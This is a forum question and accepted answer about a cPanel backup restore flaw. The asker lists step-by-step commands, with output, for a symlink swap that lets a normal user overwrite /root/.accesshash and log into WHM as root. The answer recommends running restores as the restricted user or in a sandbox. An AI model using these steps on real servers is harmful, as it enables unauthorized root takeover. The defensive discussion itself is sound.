# cp/rsync command with destination as symlink to a directory

Tags: linux, bash, shell, unix, scripting

I am working on a cPanel backup solution at the moment. We are now informed about this exploit.

Exploit : Full ROOT ACCESS to server

1.) create malicious file from, normal user account:

```
mkdir root
echo "hello" > root/.accesshash
```

2.) Wait for backup to run

3.) Replace root with a symlink:

```
ln -s /root root
```

4.) Restore root/.accesshash ( I am running this command as root for this: "cp -rf /backup/.accesshash /home/username/root/")

5.) User now have root access because We overwrote /root/.accesshash. An attacker will be able to login to WHM as root by placing a access hash into this file.

```
root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#
```

Can somebody advise me on this for a workaround? Thanks in advance.

Answer (score 1, accepted):

The key problem here is running the restore command *as root*. When doing it for a specific restricted user (who might have malicious intents), you *must* run it as that user (or maybe as an even more restricted one, restoring files in a sandbox and copying them back later).